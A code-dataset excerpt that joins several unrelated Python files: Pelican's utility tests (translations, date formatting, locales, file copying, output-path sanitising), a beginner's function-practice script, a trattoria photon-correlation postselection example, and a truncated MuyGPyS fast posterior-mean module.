lang=\"en\",\n slug=\"yay1\",\n title=\"Title\",\n content=\"in english\",\n translation=\"true\",\n )\n )\n # 2: translation metadata not on default lang\n fr_articles.append(\n get_article(\n lang=\"fr\",\n slug=\"yay2\",\n title=\"Titre\",\n content=\"en français\",\n translation=\"true\",\n )\n )\n en_articles.append(\n get_article(lang=\"en\", slug=\"yay2\", title=\"Title\", content=\"in english\")\n )\n # 3: back to default language detection if all items have the\n # translation metadata\n fr_articles.append(\n get_article(\n lang=\"fr\",\n slug=\"yay3\",\n title=\"Titre\",\n content=\"en français\",\n translation=\"yep\",\n )\n )\n en_articles.append(\n get_article(\n lang=\"en\",\n slug=\"yay3\",\n title=\"Title\",\n content=\"in english\",\n translation=\"yes\",\n )\n )\n # 4-5: translation pairs with the same slug but different category\n fr_articles.append(\n get_article(\n lang=\"fr\",\n slug=\"yay4\",\n title=\"Titre\",\n content=\"en français\",\n category=\"foo\",\n )\n )\n en_articles.append(\n get_article(\n lang=\"en\",\n slug=\"yay4\",\n title=\"Title\",\n content=\"in english\",\n category=\"foo\",\n )\n )\n fr_articles.append(\n get_article(\n lang=\"fr\",\n slug=\"yay4\",\n title=\"Titre\",\n content=\"en français\",\n category=\"bar\",\n )\n )\n en_articles.append(\n get_article(\n lang=\"en\",\n slug=\"yay4\",\n title=\"Title\",\n content=\"in english\",\n category=\"bar\",\n )\n )\n\n # try adding articles in both orders\n for lang0_articles, lang1_articles in (\n (fr_articles, en_articles),\n (en_articles, fr_articles),\n ):\n articles = lang0_articles + lang1_articles\n\n # test process_translations with falsy translation_id\n index, trans = utils.process_translations(articles, translation_id=None)\n for i in range(6):\n for lang_articles in [en_articles, fr_articles]:\n self.assertIn(lang_articles[i], index)\n self.assertNotIn(lang_articles[i], trans)\n\n # test process_translations with simple and complex translation_id\n for translation_id in [\"slug\", {\"slug\", \"category\"}]:\n index, trans = utils.process_translations(\n articles, translation_id=translation_id\n )\n\n for a in [\n en_articles[0],\n fr_articles[1],\n en_articles[2],\n en_articles[3],\n en_articles[4],\n en_articles[5],\n ]:\n self.assertIn(a, index)\n self.assertNotIn(a, trans)\n\n for a in [\n fr_articles[0],\n en_articles[1],\n fr_articles[2],\n fr_articles[3],\n fr_articles[4],\n fr_articles[5],\n ]:\n self.assertIn(a, trans)\n self.assertNotIn(a, index)\n\n for i in range(6):\n self.assertIn(en_articles[i], fr_articles[i].translations)\n self.assertIn(fr_articles[i], en_articles[i].translations)\n\n for a_arts in [en_articles, fr_articles]:\n for b_arts in [en_articles, fr_articles]:\n if translation_id == \"slug\":\n self.assertIn(a_arts[4], b_arts[5].translations)\n self.assertIn(a_arts[5], b_arts[4].translations)\n elif translation_id == {\"slug\", \"category\"}:\n self.assertNotIn(a_arts[4], b_arts[5].translations)\n self.assertNotIn(a_arts[5], b_arts[4].translations)\n\n def test_clean_output_dir(self):\n retention = ()\n test_directory = os.path.join(self.temp_output, \"clean_output\")\n content = os.path.join(os.path.dirname(__file__), \"content\")\n shutil.copytree(content, test_directory)\n utils.clean_output_dir(test_directory, retention)\n self.assertTrue(os.path.isdir(test_directory))\n self.assertListEqual([], os.listdir(test_directory))\n shutil.rmtree(test_directory)\n\n def test_clean_output_dir_not_there(self):\n retention = ()\n test_directory = os.path.join(self.temp_output, \"does_not_exist\")\n utils.clean_output_dir(test_directory, retention)\n self.assertFalse(os.path.exists(test_directory))\n\n def test_clean_output_dir_is_file(self):\n retention = ()\n test_directory = os.path.join(self.temp_output, \"this_is_a_file\")\n f = open(test_directory, \"w\")\n f.write(\"\")\n f.close()\n utils.clean_output_dir(test_directory, retention)\n self.assertFalse(os.path.exists(test_directory))\n\n def test_strftime(self):\n d = utils.SafeDatetime(2012, 8, 29)\n\n # simple formatting\n self.assertEqual(utils.strftime(d, \"%d/%m/%y\"), \"29/08/12\")\n self.assertEqual(utils.strftime(d, \"%d/%m/%Y\"), \"29/08/2012\")\n\n # RFC 3339\n self.assertEqual(\n utils.strftime(d, \"%Y-%m-%dT%H:%M:%SZ\"), \"2012-08-29T00:00:00Z\"\n )\n\n # % escaped\n self.assertEqual(utils.strftime(d, \"%d%%%m%%%y\"), \"29%08%12\")\n self.assertEqual(utils.strftime(d, \"%d %% %m %% %y\"), \"29 % 08 % 12\")\n # not valid % formatter\n self.assertEqual(\n utils.strftime(d, \"10% reduction in %Y\"), \"10% reduction in 2012\"\n )\n self.assertEqual(\n utils.strftime(d, \"%10 reduction in %Y\"), \"%10 reduction in 2012\"\n )\n\n # with text\n self.assertEqual(\n utils.strftime(d, \"Published in %d-%m-%Y\"), \"Published in 29-08-2012\"\n )\n\n # with non-ascii text\n self.assertEqual(\n utils.strftime(d, \"%d/%m/%Y Øl trinken beim Besäufnis\"),\n \"29/08/2012 Øl trinken beim Besäufnis\",\n )\n\n # alternative formatting options\n self.assertEqual(utils.strftime(d, \"%-d/%-m/%y\"), \"29/8/12\")\n self.assertEqual(utils.strftime(d, \"%-H:%-M:%-S\"), \"0:0:0\")\n\n d = utils.SafeDatetime(2012, 8, 9)\n self.assertEqual(utils.strftime(d, \"%-d/%-m/%y\"), \"9/8/12\")\n\n d = utils.SafeDatetime(2021, 1, 8)\n self.assertEqual(utils.strftime(d, \"%G - %-V - %u\"), \"2021 - 1 - 5\")\n\n # test the output of utils.strftime in a different locale\n # Turkish locale\n @unittest.skipUnless(\n locale_available(\"tr_TR.UTF-8\") or locale_available(\"Turkish\"),\n \"Turkish locale needed\",\n )\n def test_strftime_locale_dependent_turkish(self):\n temp_locale = \"Turkish\" if platform == \"win32\" else \"tr_TR.UTF-8\"\n\n with utils.temporary_locale(temp_locale):\n d = utils.SafeDatetime(2012, 8, 29)\n\n # simple\n self.assertEqual(utils.strftime(d, \"%d %B %Y\"), \"29 Ağustos 2012\")\n self.assertEqual(\n utils.strftime(d, \"%A, %d %B %Y\"), \"Çarşamba, 29 Ağustos 2012\"\n )\n\n # with text\n self.assertEqual(\n utils.strftime(d, \"Yayınlanma tarihi: %A, %d %B %Y\"),\n \"Yayınlanma tarihi: Çarşamba, 29 Ağustos 2012\",\n )\n\n # non-ascii format candidate (someone might pass it… for some reason)\n self.assertEqual(\n utils.strftime(d, \"%Y yılında %üretim artışı\"),\n \"2012 yılında %üretim artışı\",\n )\n\n # test the output of utils.strftime in a different locale\n # French locale\n @unittest.skipUnless(\n locale_available(\"fr_FR.UTF-8\") or locale_available(\"French\"),\n \"French locale needed\",\n )\n def test_strftime_locale_dependent_french(self):\n temp_locale = \"French\" if platform == \"win32\" else \"fr_FR.UTF-8\"\n\n with utils.temporary_locale(temp_locale):\n d = utils.SafeDatetime(2012, 8, 29)\n\n # simple\n self.assertEqual(utils.strftime(d, \"%d %B %Y\"), \"29 août 2012\")\n\n # depending on OS, the first letter is m or M\n self.assertTrue(utils.strftime(d, \"%A\") in (\"mercredi\", \"Mercredi\"))\n\n # with text\n self.assertEqual(\n utils.strftime(d, \"Écrit le %d %B %Y\"), \"Écrit le 29 août 2012\"\n )\n\n # non-ascii format candidate (someone might pass it… for some reason)\n self.assertEqual(utils.strftime(d, \"%écrits en %Y\"), \"%écrits en 2012\")\n\n def test_maybe_pluralize(self):\n self.assertEqual(utils.maybe_pluralize(0, \"Article\", \"Articles\"), \"0 Articles\")\n self.assertEqual(utils.maybe_pluralize(1, \"Article\", \"Articles\"), \"1 Article\")\n self.assertEqual(utils.maybe_pluralize(2, \"Article\", \"Articles\"), \"2 Articles\")\n\n def test_temporary_locale(self):\n # test with default LC category\n orig_locale = locale.setlocale(locale.LC_ALL)\n\n with utils.temporary_locale(\"C\"):\n self.assertEqual(locale.setlocale(locale.LC_ALL), \"C\")\n\n self.assertEqual(locale.setlocale(locale.LC_ALL), orig_locale)\n\n # test with custom LC category\n orig_locale = locale.setlocale(locale.LC_TIME)\n\n with utils.temporary_locale(\"C\", locale.LC_TIME):\n self.assertEqual(locale.setlocale(locale.LC_TIME), \"C\")\n\n self.assertEqual(locale.setlocale(locale.LC_TIME), orig_locale)\n\n\nclass TestCopy(unittest.TestCase):\n \"\"\"Tests the copy utility\"\"\"\n\n def setUp(self):\n self.root_dir = mkdtemp(prefix=\"pelicantests.\")\n self.old_locale = locale.setlocale(locale.LC_ALL)\n locale.setlocale(locale.LC_ALL, \"C\")\n\n def tearDown(self):\n shutil.rmtree(self.root_dir)\n locale.setlocale(locale.LC_ALL, self.old_locale)\n\n def _create_file(self, *path):\n with open(os.path.join(self.root_dir, *path), \"w\") as f:\n f.write(\"42\\n\")\n\n def _create_dir(self, *path):\n os.makedirs(os.path.join(self.root_dir, *path))\n\n def _exist_file(self, *path):\n path = os.path.join(self.root_dir, *path)\n self.assertTrue(os.path.isfile(path), \"File does not exist: %s\" % path)\n\n def _exist_dir(self, *path):\n path = os.path.join(self.root_dir, *path)\n self.assertTrue(os.path.exists(path), \"Directory does not exist: %s\" % path)\n\n def test_copy_file_same_path(self):\n self._create_file(\"a.txt\")\n utils.copy(\n os.path.join(self.root_dir, \"a.txt\"), os.path.join(self.root_dir, \"b.txt\")\n )\n self._exist_file(\"b.txt\")\n\n def test_copy_file_different_path(self):\n self._create_dir(\"a\")\n self._create_dir(\"b\")\n self._create_file(\"a\", \"a.txt\")\n utils.copy(\n os.path.join(self.root_dir, \"a\", \"a.txt\"),\n os.path.join(self.root_dir, \"b\", \"b.txt\"),\n )\n self._exist_dir(\"b\")\n self._exist_file(\"b\", \"b.txt\")\n\n def test_copy_file_create_dirs(self):\n self._create_file(\"a.txt\")\n utils.copy(\n os.path.join(self.root_dir, \"a.txt\"),\n os.path.join(self.root_dir, \"b0\", \"b1\", \"b2\", \"b3\", \"b.txt\"),\n )\n self._exist_dir(\"b0\")\n self._exist_dir(\"b0\", \"b1\")\n self._exist_dir(\"b0\", \"b1\", \"b2\")\n self._exist_dir(\"b0\", \"b1\", \"b2\", \"b3\")\n self._exist_file(\"b0\", \"b1\", \"b2\", \"b3\", \"b.txt\")\n\n def test_copy_dir_same_path(self):\n self._create_dir(\"a\")\n self._create_file(\"a\", \"a.txt\")\n utils.copy(os.path.join(self.root_dir, \"a\"), os.path.join(self.root_dir, \"b\"))\n self._exist_dir(\"b\")\n self._exist_file(\"b\", \"a.txt\")\n\n def test_copy_dir_different_path(self):\n self._create_dir(\"a0\")\n self._create_dir(\"a0\", \"a1\")\n self._create_file(\"a0\", \"a1\", \"a.txt\")\n self._create_dir(\"b0\")\n utils.copy(\n os.path.join(self.root_dir, \"a0\", \"a1\"),\n os.path.join(self.root_dir, \"b0\", \"b1\"),\n )\n self._exist_dir(\"b0\", \"b1\")\n self._exist_file(\"b0\", \"b1\", \"a.txt\")\n\n def test_copy_dir_create_dirs(self):\n self._create_dir(\"a\")\n self._create_file(\"a\", \"a.txt\")\n utils.copy(\n os.path.join(self.root_dir, \"a\"),\n os.path.join(self.root_dir, \"b0\", \"b1\", \"b2\", \"b3\", \"b\"),\n )\n self._exist_dir(\"b0\")\n self._exist_dir(\"b0\", \"b1\")\n self._exist_dir(\"b0\", \"b1\", \"b2\")\n self._exist_dir(\"b0\", \"b1\", \"b2\", \"b3\")\n self._exist_dir(\"b0\", \"b1\", \"b2\", \"b3\", \"b\")\n self._exist_file(\"b0\", \"b1\", \"b2\", \"b3\", \"b\", \"a.txt\")\n\n\nclass TestDateFormatter(unittest.TestCase):\n \"\"\"Tests that the output of DateFormatter jinja filter is same as\n utils.strftime\"\"\"\n\n def setUp(self):\n # prepare a temp content and output folder\n self.temp_content = mkdtemp(prefix=\"pelicantests.\")\n self.temp_output = mkdtemp(prefix=\"pelicantests.\")\n\n # prepare a template file\n template_dir = os.path.join(self.temp_content, \"template\")\n template_path = os.path.join(template_dir, \"source.html\")\n os.makedirs(template_dir)\n with open(template_path, \"w\") as template_file:\n template_file.write('date = {{ date|strftime(\"%A, %d %B %Y\") }}')\n self.date = utils.SafeDatetime(2012, 8, 29)\n\n def tearDown(self):\n shutil.rmtree(self.temp_content)\n shutil.rmtree(self.temp_output)\n # reset locale to default\n locale.setlocale(locale.LC_ALL, \"\")\n\n @unittest.skipUnless(\n locale_available(\"fr_FR.UTF-8\") or locale_available(\"French\"),\n \"French locale needed\",\n )\n def test_french_strftime(self):\n # This test tries to reproduce an issue that\n # occurred with python3.3 under macos10 only\n temp_locale = \"French\" if platform == \"win32\" else \"fr_FR.UTF-8\"\n\n with utils.temporary_locale(temp_locale):\n date = utils.SafeDatetime(2014, 8, 14)\n # we compare the lower() dates since macos10 returns\n # \"Jeudi\" for %A whereas linux reports \"jeudi\"\n self.assertEqual(\n \"jeudi, 14 août 2014\",\n utils.strftime(date, date_format=\"%A, %d %B %Y\").lower(),\n )\n df = utils.DateFormatter()\n self.assertEqual(\n \"jeudi, 14 août 2014\", df(date, date_format=\"%A, %d %B %Y\").lower()\n )\n\n # Let us now set the global locale to C:\n with utils.temporary_locale(\"C\"):\n # DateFormatter should still work as expected\n # since it is the whole point of DateFormatter\n # (This is where pre-2014/4/15 code fails on macos10)\n df_date = df(date, date_format=\"%A, %d %B %Y\").lower()\n self.assertEqual(\"jeudi, 14 août 2014\", df_date)\n\n @unittest.skipUnless(\n locale_available(\"fr_FR.UTF-8\") or locale_available(\"French\"),\n \"French locale needed\",\n )\n def test_french_locale(self):\n if platform == \"win32\":\n locale_string = \"French\"\n else:\n locale_string = \"fr_FR.UTF-8\"\n settings = read_settings(\n override={\n \"LOCALE\": locale_string,\n \"TEMPLATE_PAGES\": {\"template/source.html\": \"generated/file.html\"},\n }\n )\n\n generator = TemplatePagesGenerator(\n {\"date\": self.date}, settings, self.temp_content, \"\", self.temp_output\n )\n generator.env.filters.update({\"strftime\": utils.DateFormatter()})\n\n writer = Writer(self.temp_output, settings=settings)\n generator.generate_output(writer)\n\n output_path = os.path.join(self.temp_output, \"generated\", \"file.html\")\n\n # output file has been generated\n self.assertTrue(os.path.exists(output_path))\n\n # output content is correct\n with utils.pelican_open(output_path) as output_file:\n self.assertEqual(\n output_file, utils.strftime(self.date, \"date = %A, %d %B %Y\")\n )\n\n @unittest.skipUnless(\n locale_available(\"tr_TR.UTF-8\") or locale_available(\"Turkish\"),\n \"Turkish locale needed\",\n )\n def test_turkish_locale(self):\n if platform == \"win32\":\n locale_string = \"Turkish\"\n else:\n locale_string = \"tr_TR.UTF-8\"\n settings = read_settings(\n override={\n \"LOCALE\": locale_string,\n \"TEMPLATE_PAGES\": {\"template/source.html\": \"generated/file.html\"},\n }\n )\n\n generator = TemplatePagesGenerator(\n {\"date\": self.date}, settings, self.temp_content, \"\", self.temp_output\n )\n generator.env.filters.update({\"strftime\": utils.DateFormatter()})\n\n writer = Writer(self.temp_output, settings=settings)\n generator.generate_output(writer)\n\n output_path = os.path.join(self.temp_output, \"generated\", \"file.html\")\n\n # output file has been generated\n self.assertTrue(os.path.exists(output_path))\n\n # output content is correct\n with utils.pelican_open(output_path) as output_file:\n self.assertEqual(\n output_file, utils.strftime(self.date, \"date = %A, %d %B %Y\")\n )\n\n\nclass TestSanitisedJoin(unittest.TestCase):\n def test_detect_parent_breakout(self):\n with self.assertRaisesRegex(\n RuntimeError,\n \"Attempted to break out of output directory to \" \"(.*?:)?/foo/test\",\n ): # (.*?:)? accounts for Windows root\n utils.sanitised_join(\"/foo/bar\", \"../test\")\n\n def test_detect_root_breakout(self):\n with self.assertRaisesRegex(\n RuntimeError,\n \"Attempted to break out of output directory to \" \"(.*?:)?/test\",\n ): # (.*?:)? accounts for Windows root\n utils.sanitised_join(\"/foo/bar\", \"/test\")\n\n def test_pass_deep_subpaths(self):\n self.assertEqual(\n utils.sanitised_join(\"/foo/bar\", \"test\"),\n utils.posixize_path(os.path.abspath(os.path.join(\"/foo/bar\", \"test\"))),\n )\n\n\nclass TestMemoized(unittest.TestCase):\n def test_memoized(self):\n class Container:\n def _get(self, key):\n pass\n\n @utils.memoized\n def get(self, key):\n return self._get(key)\n\n container = Container()\n\n with unittest.mock.patch.object(\n container, \"_get\", side_effect=lambda x: x\n ) as get_mock:\n self.assertEqual(\"foo\", container.get(\"foo\"))\n get_mock.assert_called_once_with(\"foo\")\n\n get_mock.reset_mock()\n self.assertEqual(\"foo\", container.get(\"foo\"))\n get_mock.assert_not_called()\n\n self.assertEqual(\"bar\", container.get(\"bar\"))\n get_mock.assert_called_once_with(\"bar\")\n\n get_mock.reset_mock()\n container.get.cache.clear()\n self.assertEqual(\"bar\", container.get(\"bar\"))\n get_mock.assert_called_once_with(\"bar\")\n","repo_name":"getpelican/pelican","sub_path":"pelican/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":34429,"program_lang":"python","lang":"en","doc_type":"code","stars":11876,"dataset":"github-code","pt":"37"} +{"seq_id":"6020551756","text":"# 1] write a function to find the maximum of 3 numbers\ndef max_num(a,b,c):\n return max([a,b,c])\n\nprint(max_num(2,50,95))\nprint(max_num(900,510,60))\nprint(max_num(23,-5930,989))\n\n\nprint('XXXXXXXXXXXXXXXXXX')\n# 2] write a function to multiply all the numbers in a list\ndef mult_list(lst):\n if len(lst) ==0:\n return 0\n prod = lst[0]\n if len(lst) > 1:\n for i in lst[1:]:\n prod = prod * i\n return prod\n\nprint(mult_list([1,2,3]))\nprint(mult_list([]))\nprint(mult_list([15]))\n\n\nprint('XXXXXXXXXXXXXXXXXX')\n# 3] write a function to reverse a string\ndef rev_string(my_string):\n return my_string[::-1]\n\nprint(rev_string(' '))\nprint(rev_string('apple'))\nprint(rev_string('hello my name is bb'))\n\n\nprint('XXXXXXXXXXXXXXXXXX')\n# 4] write a function to check whether a number falls in a given range\ndef num_within_range(x,a,b):\n return x in range(a,b+1)\n\nprint(num_within_range(3,2,4))\nprint(num_within_range(8,12,24))\nprint(num_within_range(10,2,50))\n\n\nprint('XXXXXXXXXXXXXXXXXX')\n# 5] write a function that prints out the first n rows of pascals traingle\ntriangle = [[1], [1,1]]\ndef pascal(n):\n if n < 1:\n print('invalid number of rows')\n elif n == 1:\n print(triangle[0])\n else:\n row_number = 2\n while len(triangle) < n:\n row = []\n row_prev = triangle[row_number - 1]\n length = len(row_prev) + 1\n for i in range(length):\n if i == 0:\n row.append(1)\n elif i > 0 and i < length-1:\n row.append(triangle[row_number - 1][i - 1]+triangle[row_number - 1][i])\n else:\n row.append(1)\n triangle.append(row)\n row_number += 1\n for row in triangle:\n print(row)\n\npascal(2)\npascal(5)","repo_name":"bamay002/Python-Function-Practice-Part-4","sub_path":"practice4.py","file_name":"practice4.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73928328427","text":"import os\nfrom pathlib import Path\nfrom time import perf_counter\n\nimport matplotlib.pyplot as plt\n\nimport trattoria\n\n# ptu_filepath = Path(\"/Users/garfield/Downloads/20191205_Xminus_0p1Ve-6_CW_HBT.ptu\")\nptu_filepath = Path(\"/Users/garfield/Downloads/GUI_T3_10s.ptu\")\n# ptu_filepath = Path(\"/Users/garfield/Downloads/GUI_T2.ptu\")\nptu = trattoria.PTUFile(ptu_filepath)\nfile_size = os.path.getsize(ptu_filepath) / (1024.0 ** 3)\nprint(ptu)\n\n# Test G2 With manual postselection\nstart_time = perf_counter()\n\n\n# We can manually specify what records to consider.\n# Note the explicit casting to integers. G2Parameters expects a pair of actual\n# integers, hence the int(1e7) and the use of tuples. For example the following\n# is not valid:\n# [[0, int(1e7)]] <- invalid. This a list of lists not a list of tuples\n# [(0, 1e7)] <- invalid. This a list of tuples but one of the values is a float!\nmanual_post_selection_ranges = [\n (0, int(1e7)),\n (int(3e7), int(4e7)),\n]\n\n# you can also derive the postselection intervals based on an intensity threshold\ntimetrace_params = trattoria.TimeTraceParameters(\n resolution=0.1,\n channel=0,\n)\ntt_res = ptu.timetrace(timetrace_params)\n\nauto_post_selection_ranges = trattoria.construct_postselect_vector(\n tt_res, # Result from a timetrace experiment\n 1000, # Counts per time resolution bin in the trace\n True, # True = select above the threshold, False = select below\n)\n\ng2_params = trattoria.G2Parameters(\n channel_1=1,\n channel_2=2,\n correlation_window=10000e-12,\n resolution=60e-12,\n record_ranges=auto_post_selection_ranges,\n)\ng2_res = ptu.g2(g2_params)\nend_time = perf_counter()\ntime_delta = end_time - start_time\nprint(f\"G2 execution time: {time_delta:.3f} s\")\nprint(f\" Processed {file_size/time_delta:.2f} GB/s\")\n\nplt.plot(g2_res.t * 1e9, g2_res.g2)\nplt.xlabel(\"Delay (ns)\")\nplt.show()\n","repo_name":"GCBallesteros/trattoria","sub_path":"examples/postselection.py","file_name":"postselection.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"31052976308","text":"from time import perf_counter\nfrom typing import Dict, List, Tuple, Union\n\nimport MuyGPyS._src.math as mm\nfrom MuyGPyS.gp import MuyGPS, MultivariateMuyGPS as MMuyGPS\nfrom MuyGPyS.examples.from_indices import fast_posterior_mean_from_indices\nfrom MuyGPyS.examples.regress import _decide_and_make_regressor\nfrom MuyGPyS.gp.tensors import fast_nn_update\nfrom MuyGPyS.gp.tensors import pairwise_tensor\nfrom MuyGPyS.neighbors import NN_Wrapper\nfrom MuyGPyS.optimize import Bayes_optimize, OptimizeFn\nfrom MuyGPyS.optimize.loss import LossFn, lool_fn\n\n\ndef make_fast_regressor(\n muygps: MuyGPS,\n nbrs_lookup: NN_Wrapper,\n train_features: mm.ndarray,\n train_targets: mm.ndarray,\n) -> Tuple[mm.ndarray, mm.ndarray]:\n \"\"\"\n Convenience function for creating precomputed coefficient matrix and neighbor lookup data\n structure.\n\n Args:\n muygps:\n A (possibly trained) MuyGPS object.\n nbrs_lookup:\n A data structure supporting nearest neighbor queries into\n `train_features`.\n train_features:\n A matrix of shape `(train_count, feature_count)` whose rows consist\n of observation vectors of the train data.\n train_targets:\n A matrix of shape `(train_count, response_count)` whose rows consist\n of response vectors of the train data.\n\n Returns\n -------\n precomputed_coefficients_matrix:\n A matrix of shape `(train_count, nn_count)` whose rows list the\n precomputed coefficients for each nearest neighbors set in the\n training data.\n nn_indices:\n A numpy.ndarrray supporting nearest neighbor queries.\n \"\"\"\n\n num_training_samples, _ = train_features.shape\n nn_indices, _ = nbrs_lookup.get_batch_nns(\n mm.arange(0, num_training_samples)\n )\n nn_indices = fast_nn_update(nn_indices)\n\n train_nn_targets = train_targets[nn_indices]\n K = muygps.kernel(pairwise_tensor(train_features, nn_indices))\n\n precomputed_coefficients_matrix = muygps.fast_coefficients(\n K, train_nn_targets\n )\n\n return precomputed_coefficients_matrix, nn_indices\n\n\ndef make_fast_multivariate_regressor(\n mmuygps: MMuyGPS,\n nbrs_lookup: NN_Wrapper,\n train_features: mm.ndarray,\n train_targets: mm.ndarray,\n) -> Tuple[mm.ndarray, mm.ndarray]:\n \"\"\"\n Convenience function for creating precomputed coefficient matrix and neighbor lookup data\n structure.\n\n Args:\n muygps:\n A trained MultivariateMuyGPS object.\n nbrs_lookup:\n A data structure supporting nearest neighbor queries into\n `train_features`.\n train_features:\n A matrix of shape `(train_count, feature_count)` whose rows consist\n of observation vectors of the train data.\n train_targets:\n A matrix of shape `(train_count, response_count)` whose rows consist\n of response vectors of the train data.\n\n Returns\n -------\n precomputed_coefficients_matrix:\n A matrix of shape `(train_count, nn_count)` whose rows list the\n precomputed coefficients for each nearest neighbors set in the\n training data.\n nn_indices:\n An array supporting nearest neighbor queries.\n \"\"\"\n num_training_samples, _ = train_features.shape\n nn_indices, _ = nbrs_lookup.get_batch_nns(\n mm.arange(0, num_training_samples)\n )\n\n nn_indices = fast_nn_update(nn_indices)\n pairwise_diffs_fast = pairwise_tensor(train_features, nn_indices)\n train_nn_targets = train_targets[nn_indices]\n precomputed_coefficients_matrix = mmuygps.fast_coefficients(\n pairwise_diffs_fast, train_nn_targets\n )\n return precomputed_coefficients_matrix, nn_indices\n\n\ndef _decide_and_make_fast_regressor(\n muygps: Union[MuyGPS, MMuyGPS],\n nbrs_lookup: NN_Wrapper,\n train_features: mm.ndarray,\n train_targets: mm.ndarray,\n) -> Tuple[mm.ndarray, mm.ndarray]:\n if isinstance(muygps, MuyGPS):\n precomputed_coefficients_matrix, nn_indices = make_fast_regressor(\n muygps,\n nbrs_lookup,\n train_features,\n train_targets,\n )\n else:\n (\n precomputed_coefficients_matrix,\n nn_indices,\n ) = make_fast_multivariate_regressor(\n muygps,\n nbrs_lookup,\n train_features,\n train_targets,\n )\n return precomputed_coefficients_matrix, nn_indices\n\n\ndef do_fast_posterior_mean(\n test_features: mm.ndarray,\n train_features: mm.ndarray,\n train_targets: mm.ndarray,\n nn_count: int = 30,\n batch_count: int = 200,\n loss_fn: LossFn = lool_fn,\n opt_fn: OptimizeFn = Bayes_optimize,\n k_kwargs: Union[Dict, Union[List[Dict], Tuple[Dict, ...]]] = dict(),\n nn_kwargs: Dict = dict(),\n opt_kwargs: Dict = dict(),\n verbose: bool = False,\n) -> Tuple[mm.ndarray, NN_Wrapper, mm.ndarray, mm.ndarray, Dict]:\n \"\"\"\n Convenience function initializing a model and performing fast posterior mean\n inference.\n\n Expected parameters include keyword argument dicts specifying kernel\n parameters and nearest neighbor parameters. See the docstrings of the\n appropriate functions for specifics.\n\n Also supports workflows relying upon multivariate models. In order to create\n a multivariate model, specify the `kern` argument and pass a list of\n hyperparameter dicts to `k_kwargs`.\n\n Example:\n >>> from MuyGPyS.testing.test_utils import _make_gaussian_data\n >>> from MuyGPyS.examples.fast_posterior_mean import do_fast_posterior_mean\n >>> from MuyGPyS.gp.deformation import F2, Isotropy\n >>> from MuyGPyS.gp.hyperparameter import Parameter\n >>> from MuyGPyS.gp.hyperparameter import AnalyticScale\n >>> from MuyGPyS.gp.kernels import RBF\n >>> from MuyGPyS.gp.noise import HomoscedasticNoise\n >>> from MuyGPyS.optimize import Bayes_optimize\n >>> from MuyGPyS.optimize.objective import mse_fn\n >>> train_features, train_responses = make_train() # stand-in function\n >>> test_features, test_responses = make_test() # stand-in function\n >>> nn_kwargs = {\"nn_method\": \"exact\", \"algorithm\": \"ball_tree\"}\n >>> k_kwargs = {\n ... \"kernel\": RBF(\n ... deformation=Isotropy(\n ... metric=F2,\n ... length_scale=Parameter(1.0, (1e-2, 1e2))\n ... )\n ... ),\n ... \"noise\": HomoscedasticNoise(1e-5),\n ... \"scale\": AnalyticScale(),\n ... }\n >>> (\n ... muygps, nbrs_lookup, predictions, precomputed_coefficients_matrix\n ... ) = do_fast_posterior_mean(\n ... test_features,\n ... train_features,\n ... train_responses,\n ... nn_count=30,\n ... batch_count=200,\n ... loss_fn=lool_fn,\n ... opt_fn=Bayes_optimize,\n ... k_kwargs=k_kwargs,\n ... nn_kwargs=nn_kwargs,\n ... verbose=False,\n ... )\n\n Args:\n test_features:\n A matrix of shape `(test_count, feature_count)` whose rows consist\n of observation vectors of the test data.\n train_features:\n A matrix of shape `(train_count, feature_count)` whose rows consist\n of observation vectors of the train data.\n train_targets:\n A matrix of shape `(train_count, response_count)` whose rows consist\n of response vectors of the train data.\n nn_count:\n The number of nearest neighbors to employ.\n batch_count:\n The number of elements to sample batch for hyperparameter\n optimization.\n loss_fn:\n The loss functor to use in hyperparameter optimization. Ignored if\n all of the parameters specified by argument `k_kwargs` are fixed.\n opt_fn:\n The optimization functor to use in hyperparameter optimization.\n Ignored if all of the parameters specified by argument `k_kwargs`\n are fixed.\n k_kwargs:\n If given a list or tuple of length `response_count`, assume that the\n elements are dicts containing kernel initialization keyword\n arguments for the creation of a multivariate model (see\n :func:`~MuyGPyS.examples.regress.make_multivariate_regressor`).\n If given a dict, assume that the elements are keyword arguments to\n a MuyGPs model (see\n :func:`~MuyGPyS.examples.regress.make_regressor`).\n nn_kwargs:\n Parameters for the nearest neighbors wrapper. See\n :class:`MuyGPyS.neighbors.NN_Wrapper` for the supported methods and\n their parameters.\n opt_kwargs:\n Parameters for the wrapped optimizer. See the docs of the\n corresponding library for supported parameters.\n verbose:\n If `True`, print summary statistics.\n\n Returns\n -------\n muygps:\n A (possibly trained) MuyGPs object.\n nbrs_lookup:\n A data structure supporting nearest neighbor queries into\n `train_features`.\n predictions:\n The predicted response associated with each test observation.\n precomputed_coefficients_matrix:\n A matrix of shape `(train_count, nn_count)` whose rows list the\n precomputed coefficients for each nearest neighbors set in the\n training data.\n timing:\n A dictionary containing timings for the training, precomputation,\n nearest neighbor computation, and prediction.\n \"\"\"\n regressor, nbrs_lookup = _decide_and_make_regressor(\n train_features,\n train_targets,\n nn_count=nn_count,\n batch_count=batch_count,\n loss_fn=loss_fn,\n opt_fn=opt_fn,\n k_kwargs=k_kwargs,\n nn_kwargs=nn_kwargs,\n opt_kwargs=opt_kwargs,\n verbose=verbose,\n )\n\n (\n posterior_mean,\n precomputed_coefficients_matrix,\n timing,\n ) = fast_posterior_mean_any(\n regressor,\n test_features,\n train_features,\n nbrs_lookup,\n train_targets,\n )\n return (\n regressor,\n nbrs_lookup,\n posterior_mean,\n precomputed_coefficients_matrix,\n timing,\n )\n\n\ndef fast_posterior_mean_any(\n muygps: Union[MuyGPS, MMuyGPS],\n test_features: mm.ndarray,\n train_features: mm.ndarray,\n nbrs_lookup: NN_Wrapper,\n train_targets: mm.ndarray,\n) -> Tuple[mm.ndarray, mm.ndarray, Dict]:\n \"\"\"\n Convenience function performing fast posterior mean inference using a\n pre-trained model.\n\n Also supports workflows relying upon multivariate models.\n\n Args:\n muygps:\n A (possibly trained) MuyGPS object.\n test_features:\n A matrix of shape `(test_count, feature_count)` whose rows consist\n of observation vectors of the test data.\n train_features:\n A matrix of shape `(train_count, feature_count)` whose rows consist\n of observation vectors of the train data.\n nbrs_lookup:\n A data structure supporting nearest neighbor queries into\n `train_features`.\n train_targets:\n A matrix of shape 